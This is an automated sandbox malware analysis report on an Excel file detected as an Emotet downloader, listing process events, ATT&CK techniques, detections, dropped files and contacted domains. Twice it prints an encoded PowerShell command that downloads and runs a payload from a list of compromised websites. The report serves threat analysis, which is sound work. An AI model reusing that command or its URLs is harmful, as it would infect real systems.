Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -enc jabnagoacwblagiabgbnahuaawbpahcadqbnadmaawb3agoazaa9aciaaab0ahqacaa6ac8alwbhagmadabpahyaaqbkageazablahmalgbsageazgbvahiazqb0agwayqbuagcadqbhagcazqbzac4aywbvag0alwb3ahaalqbhagqabqbpag4alwbcagwaawbkae8aswbeafgataavacwaaab0ahqacaa6ac8alwbzagiaywbvahaaeqbsagkadgblac4aywbvag0algbiahialwbyagoadqb6ac8adwavacwaaab0ahqacabzadoalwavahqacgbhahmaaqb4ac4aywbvag0alwb3ahaalqbhagqabqbpag4alwb5aduaqqbhadeaagb0adaauwbwadiauqbrac8alaboahqadabwahmaogavac8adwb3ahcalgbwageacgbragkabgbzag8abgbzac4aywbvac4aaqbuac8ayqbiagmalwbzadyawqawagyavabiafuarqbnadyalwasaggadab0ahaacwa6ac8alwbiagkaegauag0azqbyagwaaqbuac4adqbhac8adwbwac0ayqbkag0aaqbuac8avwa2ageazwb0aeyauwbsafoarwb0admanwaxagqavgavacwaaab0ahqacaa6ac8alwbiahiadqbjagsazqb2ag4algbzagkadablac8amwb5ahoadab6ahoadgboac8abgbtafkanab3afoazgbiafkataavacwaaab0ahqacabzadoalwavahaayqbyagqaaqbzagsabwbvagqalgbjag8abqavahcacaatagmabwbuahqazqbuahqalwboafialwasaggadab0ahaacwa6ac8alwbkageadqbqagkabqbhaggayqbyageaagbtageabgbkagkacgauag8acgbnac8adwbwac0aaqbuagmabab1agqazqbzac8angazaeqazqavacwaaab0ahqacabzadoalwavagqayqb0ageacwbpahqacwauagmabwbtac8adwbwac0aaqbuagmabab1agqazqbzac8awgbragoanabrae8alwasaggadab0ahaacwa6ac8alwbhag4adqbnaguacgbhaggabqbhahmaaqbuahqazqbyag4ayqbzagkabwbuageabaauagmabwauagkazaavahcacaatageazabtagkabgavafmasgbiahgarqa1aekalwasaggadab0ahaacwa6ac8alwbhahqabqblagqaaqbjac4aywbsac8acwbpahmadablag0ayqbzac8amwbaagiacwbvaeeavqavacwaaab0ahqacabzadoalwavageabgb3ageacgbhagwaygbhahmayqb0aguazqbuac4aywbvag0alwbgag8aeaataemanaawadqalwbtaeqasabragyazwblagiatqbsahoabqbhaesaqgb5ac8aigauahmacabmagkavaaoacialaaiackaowbmae8acgblageaqwboacgajaboagsabab3afiasabkafmazqa0aggaiabpag4aiaakagcaagbzaguaygbuagcadqbragkadwb1agcamwbrahcaagbkackaewakaeoacwazaggababzagsazabjagyaawa9aciadgbiagsadwbraciaowakahmazablahcasabtahcamwbnagsaagbzagqapqbhaguadaatafiayqbuagqabwbtadsajabjaeqacgbmagcaaabzagiaegbragoaeabkad0aigbjadoaxabwahiabwbnahiayqbtagqayqb0ageaxaaiacsajabkahmamwboagwacwbragqaywbmagsakwaiac4azabsagwaiga7agkatgb2ae8aawblac0adwbfagiacgblafeadqblahmavaagac0adqbsagkaiaakaggaawbsahcaugbiaeoauwbladqaaaagac0abwb1afqazgbpaewazqagacqasqbeahiazgbnaggacwbiahoaawbqahgazaa7agkazgaoahqazqbzahqalqbwaeeadabiacaajabjaeqacgbmagcaaabzagiaegbragoaeabkackaewbpagyakaaoagcazqb0ac0aaqbuaguabqagacqasqbeahiazgbnaggacwbiahoaawbqahgazaapac4atablag4azwb0aggaiaatagcazqagaduamaawadaamaapahsaygbyaguayqbradsafqb9ah0a
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -enc jabnagoacwblagiabgbnahuaawbpahcadqbnadmaawb3agoazaa9aciaaab0ahqacaa6ac8alwbhagmadabpahyaaqbkageazablahmalgbsageazgbvahiazqb0agwayqbuagcadqbhagcazqbzac4aywbvag0alwb3ahaalqbhagqabqbpag4alwbcagwaawbkae8aswbeafgataavacwaaab0ahqacaa6ac8alwbzagiaywbvahaaeqbsagkadgblac4aywbvag0algbiahialwbyagoadqb6ac8adwavacwaaab0ahqacabzadoalwavahqacgbhahmaaqb4ac4aywbvag0alwb3ahaalqbhagqabqbpag4alwb5aduaqqbhadeaagb0adaauwbwadiauqbrac8alaboahqadabwahmaogavac8adwb3ahcalgbwageacgbragkabgbzag8abgbzac4aywbvac4aaqbuac8ayqbiagmalwbzadyawqawagyavabiafuarqbnadyalwasaggadab0ahaacwa6ac8alwbiagkaegauag0azqbyagwaaqbuac4adqbhac8adwbwac0ayqbkag0aaqbuac8avwa2ageazwb0aeyauwbsafoarwb0admanwaxagqavgavacwaaab0ahqacaa6ac8alwbiahiadqbjagsazqb2ag4algbzagkadablac8amwb5ahoadab6ahoadgboac8abgbtafkanab3afoazgbiafkataavacwaaab0ahqacabzadoalwavahaayqbyagqaaqbzagsabwbvagqalgbjag8abqavahcacaatagmabwbuahqazqbuahqalwboafialwasaggadab0ahaacwa6ac8alwbkageadqbqagkabqbhaggayqbyageaagbtageabgbkagkacgauag8acgbnac8adwbwac0aaqbuagmabab1agqazqbzac8angazaeqazqavacwaaab0ahqacabzadoalwavagqayqb0ageacwbpahqacwauagmabwbtac8adwbwac0aaqbuagmabab1agqazqbzac8awgbragoanabrae8alwasaggadab0ahaacwa6ac8alwbhag4adqbnaguacgbhaggabqbhahmaaqbuahqazqbyag4ayqbzagkabwbuageabaauagmabwauagkazaavahcacaatageazabtagkabgavafmasgbiahgarqa1aekalwasaggadab0ahaacwa6ac8alwbhahqabqblagqaaqbjac4aywbsac8acwbpahmadablag0ayqbzac8amwbaagiacwbvaeeavqavacwaaab0ahqacabzadoalwavageabgb3ageacgbhagwaygbhahmayqb0aguazqbuac4aywbvag0alwbgag8aeaataemanaawadqalwbtaeqasabragyazwblagiatqbsahoabqbhaesaqgb5ac8aigauahmacabmagkavaaoacialaaiackaowbmae8acgblageaqwboacgajaboagsabab3afiasabkafmazqa0aggaiabpag4aiaakagcaagbzaguaygbuagcadqbragkadwb1agcamwbrahcaagbkackaewakaeoacwazaggababzagsazabjagyaawa9aciadgbiagsadwbraciaowakahmazablahcasabtahcamwbnagsaagbzagqapqbhaguadaatafiayqbuagqabwbtadsajabjaeqacgbmagcaaabzagiaegbragoaeabkad0aigbjadoaxabwahiabwbnahiayqbtagqayqb0ageaxaaiacsajabkahmamwboagwacwbragqaywbmagsakwaiac4azabsagwaiga7agkatgb2ae8aawblac0adwbfagiacgblafeadqblahmavaagac0adqbsagkaiaakaggaawbsahcaugbiaeoauwbladqaaaagac0abwb1afqazgbpaewazqagacqasqbeahiazgbnaggacwbiahoaawbqahgazaa7agkazgaoahqazqbzahqalqbwaeeadabiacaajabjaeqacgbmagcaaabzagiaegbragoaeabkackaewbpagyakaaoagcazqb0ac0aaqbuaguabqagacqasqbeahiazgbnaggacwbiahoaawbqahgazaapac4atablag4azwb0aggaiaatagcazqagaduamaawadaamaapahsaygbyaguayqbradsafqb9ah0a

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	432 Scripting	Valid Accounts	33 Exploitation for Client Execution	432 Scripting	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	OS Credential Dumping	1 File and Directory Discovery	Remote Services	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	21 Command and Scripting Interpreter	1 Obfuscated Files or Information	11 Process Injection	1 Obfuscated Files or Information	LSASS Memory	14 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	3 PowerShell	1 DLL Side-Loading	Logon Script (Windows)	1 Install Root Certificate	Security Account Manager	1 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Modify Registry	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	1 Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Rundll32	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
xxTupY4Fr3.xlsx	71%	ReversingLabs	Document-Excel.Trojan.Emotet
xxTupY4Fr3.xlsx	100%	Avira	HEUR/Macro.Downloader.AJS.Gen
xxTupY4Fr3.xlsx	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\ProgramData\jledshf.bat	100%	Avira	TR/Dldr.Emotet.A
C:\ProgramData\wetidjks.vbs	100%	Avira	VBS/Bynoco.A

Source	Detection	Scanner	Label
https://datasits.com/wp-content/plugins/elementor/assets/css/widget-image.min.css?ver=3.24.3	0%	Avira URL Cloud	safe
https://trasix.com/contacts/	0%	Avira URL Cloud	safe
http://biz.merlin.ua	0%	Avira URL Cloud	safe
https://trasix.com	0%	Avira URL Cloud	safe
https://datasits.com/wp-content/uploads/2023/02/Team-Work-1-768x236.png	0%	Avira URL Cloud	safe
https://datasits.com/wp-content/uploads/elementor/css/global.css?ver=1726776444	0%	Avira URL Cloud	safe
https://trasix.com/wp-content/uploads/2021/04/logo-trasix-dmcc-fashion-management-platform.png	0%	Avira URL Cloud	safe
https://parkinsons.co.in	0%	Avira URL Cloud	safe
http://www.parkinsons.co.in	0%	Avira URL Cloud	safe
http://cdn.jsinit.directfwd.com/Z	0%	Avira URL Cloud	safe
https://datasits.com/?feed=comments-rss2	0%	Avira URL Cloud	safe
https://datasits.com/index.php?rest_route=%2Foembed%2F1.0%2Fembed&url=https%3A%2F%2Fdatasits.co	0%	Avira URL Cloud	safe
https://datasits.com/wp-content/plugins/elementskit-lite/widgets/init/assets/js/animate-circle.min.j	0%	Avira URL Cloud	safe
https://datasits.com/wp-content/themes/astra/assets/js/minified/flexibility.min.js?ver=4.8.1	0%	Avira URL Cloud	safe
https://datasits.com/wp-content/uploads/2022/09/teamwork-300x300.png	0%	Avira URL Cloud	safe
https://datasits.com/wp-content/plugins/elementor/assets/css/widget-social-icons.min.css?ver=3.24.3	0%	Avira URL Cloud	safe
https://anugerahmasinternasional.co.id/wp-admin/SJbxE5I/	0%	Avira URL Cloud	safe
https://datasits.com/wp-content/plugins/header-footer-elementor/assets/css/header-footer-elementor.c	0%	Avira URL Cloud	safe
https://anugerahmasinternasional.co.id/#/schema/logo/image/	0%	Avira URL Cloud	safe
https://datasits.com/wp-content/plugins/elementskit-lite/modules/elementskit-icon-pack/assets/css/ek	0%	Avira URL Cloud	safe
http://sbcopylive.PH	0%	Avira URL Cloud	safe
https://datasits.com/wp-content/plugins/elementor/assets/lib/swiper/v8/css/swiper.min.css?ver=8.4.5	0%	Avira URL Cloud	safe
https://trasix.com/become-a-partner/	0%	Avira URL Cloud	safe
https://datasits.com/wp-content/plugins/elementskit-lite/widgets/init/assets/css/widget-styles.css?v	0%	Avira URL Cloud	safe
https://datasits.com/wp-content/uploads/2023/02/Team-Work-1.png	0%	Avira URL Cloud	safe
https://datasits.com/wp-content/uploads/2022/09/vision-300x300.png	0%	Avira URL Cloud	safe
https://trasix.com/wp-content/themes/trasix/images/logo.svg	0%	Avira URL Cloud	safe
https://trasix.com/modules/orders-collection-and-management/	0%	Avira URL Cloud	safe
http://cdn.jsinit.directfwd.com/3	0%	Avira URL Cloud	safe
http://anugerahmasinternasional.co.id	0%	Avira URL Cloud	safe
https://datasits.com/wp-content/uploads/2023/02/Team-Work-1-1024x315.png	0%	Avira URL Cloud	safe
http://sbcopylive.com.br3	0%	Avira URL Cloud	safe
https://trasix.com/modules/merchandizing/	0%	Avira URL Cloud	safe
https://datasits.com/wp-content/uploads/2022/09/Data-Square-for-IT-Solutions-1536x359.png	0%	Avira URL Cloud	safe
https://www.parkinsons.co.in	0%	Avira URL Cloud	safe
http://actividades.laforetlangh	0%	Avira URL Cloud	safe
https://datasits.com/wp-content/uploads/2022/09/man.png	0%	Avira URL Cloud	safe
https://trasix.com/wp-content/themes/trasix/js/parallax.js	0%	Avira URL Cloud	safe
https://datasits.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.24.3	0%	Avira URL Cloud	safe
http://sbcopylive.com.brP	0%	Avira URL Cloud	safe
https://datasits.com/wp-content/plugins/elementor/assets/css/widget-text-editor.min.css?ver=3.24.3	0%	Avira URL Cloud	safe
https://daujimaharajmandir.org	0%	Avira URL Cloud	safe
https://anugerahmasinternasional.co.id/comments/feed/	0%	Avira URL Cloud	safe
https://datasits.com/wp-content/uploads/2022/09/vision.png	0%	Avira URL Cloud	safe
https://datasits.com/wp-content/uploads/2022/09/teamwork-150x150.png	0%	Avira URL Cloud	safe
https://anugerahmasinternasional.co.id/wp-content/uploads/2022/06/cropped-Logo-Ami-1-01-32x32.png	0%	Avira URL Cloud	safe
https://datasits.com/wp-content/uploads/2022/09/man-300x300.png	0%	Avira URL Cloud	safe
https://datasits.com/index.php?rest_route=/elementskit/v1/	0%	Avira URL Cloud	safe
https://anugerahmasinternasional.co.id/	0%	Avira URL Cloud	safe
https://datasits.com/wp-content/uploads/2022/09/bussiness-man.png	0%	Avira URL Cloud	safe
http://cdn.jsinit.directfwd.com/sk-jspark_init.phpU	0%	Avira URL Cloud	safe
https://datasits.com/wp-content/plugins/elementor/assets/lib/animations/styles/fadeIn.min.css?ver=3.	0%	Avira URL Cloud	safe
https://datasits.com/wp-content/plugins/elementor/assets/css/conditionals/e-swiper.min.css?ver=3.24.	0%	Avira URL Cloud	safe
https://trasix.com/wp-content/themes/trasix/js/wow.min.js	0%	Avira URL Cloud	safe
https://datasits.com/index.php?rest_route=/wp/v2/pages/9	0%	Avira URL Cloud	safe
https://datasits.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.css?ve	0%	Avira URL Cloud	safe
https://datasits.com/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.24.3	0%	Avira URL Cloud	safe
https://datasits.com/wp-content/uploads/elementor/css/post-8.css?ver=1726776442	0%	Avira URL Cloud	safe
https://datasits.com/wp-content/themes/astra/assets/js/minified/frontend.min.js?ver=4.8.1	0%	Avira URL Cloud	safe
http://bruckevn.site	0%	Avira URL Cloud	safe
https://trasix.com/modules/digital-catalog/	0%	Avira URL Cloud	safe
https://datasits.com/wp-includes/js/jquery/ui/core.min.js?ver=1.13.3	0%	Avira URL Cloud	safe
http://parkinsons.co.in	0%	Avira URL Cloud	safe
https://pardiskood.com	0%	Avira URL Cloud	safe
https://trasix.com/?s=	0%	Avira URL Cloud	safe
https://datasits.com/wp-content/uploads/2022/09/woman-300x300.png	0%	Avira URL Cloud	safe
https://datasits.com/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.24.3	0%	Avira URL Cloud	safe
https://datasits.com/wp-content/uploads/2022/09/bussiness-man-300x300.png	0%	Avira URL Cloud	safe
https://datasits.com/?page_id=1229	0%	Avira URL Cloud	safe
https://datasits.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/regular.min.css?ver=5.	0%	Avira URL Cloud	safe
https://trasix.com/wp-content/themes/trasix/images/abstract.png	0%	Avira URL Cloud	safe
https://datasits.com/?page_id=1130	0%	Avira URL Cloud	safe
https://datasits.com/wp-content/uploads/2022/09/Quality-150x150.png	0%	Avira URL Cloud	safe
https://datasits.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1	0%	Avira URL Cloud	safe
https://datasits.com/wp-content/plugins/elementor/assets/css/conditionals/apple-webkit.min.css?ver=3	0%	Avira URL Cloud	safe
https://anwaralbasateen.com	0%	Avira URL Cloud	safe
https://datasits.com/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.24.3	0%	Avira URL Cloud	safe
https://datasits.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1	0%	Avira URL Cloud	safe
https://datasits.com/wp-content/plugins/elementskit-lite/widgets/init/assets/js/elementor.js?ver=3.2	0%	Avira URL Cloud	safe
http://sbcopylive.com.br	0%	Avira URL Cloud	safe
http://cdn.jsinit.directfwd.com/sk-jspark_init.php0	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
actividades.laforetlanguages.com	217.160.0.236	true	true	unknown
biz.merlin.ua	195.177.124.30	true	true	unknown
parkinsons.co.in	147.79.119.239	true	true	unknown
pardiskood.com	188.114.96.3	true	true	unknown
datasits.com	63.250.43.10	true	true	unknown
daujimaharajmandir.org	15.197.148.33	true	true	unknown
www.parkinsons.co.in.cdn.hstgr.net	77.37.50.35	true	false	unknown
trasix.com	20.23.238.122	true	true	unknown
anugerahmasinternasional.co.id	104.21.3.222	true	true	unknown
anwaralbasateen.com	207.174.214.153	true	true	unknown
atmedic.cl	unknown	unknown	true	unknown
bruckevn.site	unknown	unknown	true	unknown
sbcopylive.com.br	unknown	unknown	false	high
www.parkinsons.co.in	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://anugerahmasinternasional.co.id/wp-admin/SJbxE5I/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.parkinsons.co.in	powershell.exe, 00000009.00000002.511859762.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.515090897.0000000002936000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://parkinsons.co.in	powershell.exe, 00000005.00000002.477673890.0000000003096000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000002F37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.515090897.0000000002855000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.515090897.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cdn.jsinit.directfwd.com/Z	powershell.exe, 00000005.00000002.481718749.000000001C5FE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://datasits.com/wp-content/uploads/2023/02/Team-Work-1-768x236.png	powershell.exe, 00000009.00000002.511859762.0000000002A45000.00000004.00000800.00020000.00000000.sdmp, vbkwk.dll.5.dr	true	Avira URL Cloud: safe	unknown
http://biz.merlin.ua	powershell.exe, 00000005.00000002.477673890.0000000003096000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.515090897.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	powershell.exe, 00000005.00000002.481718749.000000001C56A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.516200270.000000001C457000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.521065638.000000001C514000.00000004.00000020.00020000.00000000.sdmp	false		high
https://datasits.com/wp-content/plugins/elementor/assets/css/widget-image.min.css?ver=3.24.3	vbkwk.dll.5.dr	false	Avira URL Cloud: safe	unknown
https://datasits.com/wp-content/uploads/elementor/css/global.css?ver=1726776444	vbkwk.dll.5.dr	false	Avira URL Cloud: safe	unknown
https://trasix.com	powershell.exe, 00000005.00000002.477673890.0000000002EB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002AAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002702000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.515090897.0000000002936000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.515090897.0000000002752000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://trasix.com/contacts/	powershell.exe, 00000005.00000002.477673890.0000000002ED3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002BFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.00000000027FE000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://trasix.com/wp-content/uploads/2021/04/logo-trasix-dmcc-fashion-management-platform.png	powershell.exe, 00000009.00000002.511859762.0000000002802000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://datasits.com/wp-content/plugins/elementor/assets/css/widget-social-icons.min.css?ver=3.24.3	vbkwk.dll.5.dr	false	Avira URL Cloud: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000005.00000002.480991589.0000000012241000.00000004.00000800.00020000.00000000.sdmp	false		high
https://datasits.com/wp-content/themes/astra/assets/js/minified/flexibility.min.js?ver=4.8.1	vbkwk.dll.5.dr	false	Avira URL Cloud: safe	unknown
https://datasits.com/wp-content/plugins/elementskit-lite/widgets/init/assets/js/animate-circle.min.j	powershell.exe, 00000009.00000002.511859762.0000000002992000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002A45000.00000004.00000800.00020000.00000000.sdmp, vbkwk.dll.5.dr	false	Avira URL Cloud: safe	unknown
https://datasits.com/index.php?rest_route=%2Foembed%2F1.0%2Fembed&url=https%3A%2F%2Fdatasits.co	vbkwk.dll.5.dr	false	Avira URL Cloud: safe	unknown
https://datasits.com/?feed=comments-rss2	vbkwk.dll.5.dr	false	Avira URL Cloud: safe	unknown
https://datasits.com/wp-content/uploads/2022/09/teamwork-300x300.png	vbkwk.dll.5.dr	false	Avira URL Cloud: safe	unknown
https://anugerahmasinternasional.co.id/#/schema/logo/image/	powershell.exe, 00000005.00000002.477673890.0000000003496000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://c0.wp.com/p/woocommerce/9.3.3/assets/js/jquery-blockui/jquery.blockUI.min.js	powershell.exe, 00000005.00000002.477673890.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000003496000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000005.00000002.477673890.0000000002211000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.515090897.00000000023D1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://datasits.com/wp-content/plugins/elementskit-lite/modules/elementskit-icon-pack/assets/css/ek	vbkwk.dll.5.dr	false	Avira URL Cloud: safe	unknown
http://cdn.jsinit.directfwd.com/sk-jspark_init.php	powershell.exe, 00000005.00000002.481718749.000000001C62D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.481718749.000000001C56A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.481391228.000000001A69C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000002FCD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000002ECF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000002FBF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://datasits.com/wp-content/plugins/header-footer-elementor/assets/css/header-footer-elementor.c	vbkwk.dll.5.dr	false	Avira URL Cloud: safe	unknown
https://datasits.com/wp-content/plugins/elementor/assets/lib/swiper/v8/css/swiper.min.css?ver=8.4.5	vbkwk.dll.5.dr	false	Avira URL Cloud: safe	unknown
https://trasix.com/become-a-partner/	powershell.exe, 00000005.00000002.477673890.0000000002ED3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002BFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.00000000027FE000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://sbcopylive.PH	powershell.exe, 0000000D.00000002.515090897.0000000002936000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://datasits.com/wp-content/plugins/elementskit-lite/widgets/init/assets/css/widget-styles.css?v	vbkwk.dll.5.dr	false	Avira URL Cloud: safe	unknown
https://trasix.com/modules/orders-collection-and-management/	powershell.exe, 00000005.00000002.477673890.0000000002ED3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002BFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.00000000027FE000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://datasits.com/wp-content/uploads/2023/02/Team-Work-1.png	powershell.exe, 00000009.00000002.511859762.0000000002A45000.00000004.00000800.00020000.00000000.sdmp, vbkwk.dll.5.dr	true	Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000005.00000002.480991589.0000000012241000.00000004.00000800.00020000.00000000.sdmp	false		high
https://datasits.com/wp-content/uploads/2022/09/vision-300x300.png	vbkwk.dll.5.dr	false	Avira URL Cloud: safe	unknown
https://trasix.com/wp-content/themes/trasix/images/logo.svg	powershell.exe, 00000009.00000002.511859762.0000000002C00000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://anugerahmasinternasional.co.id	powershell.exe, 00000005.00000002.477673890.0000000003496000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cdn.jsinit.directfwd.com/3	powershell.exe, 00000005.00000002.481718749.000000001C5FE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
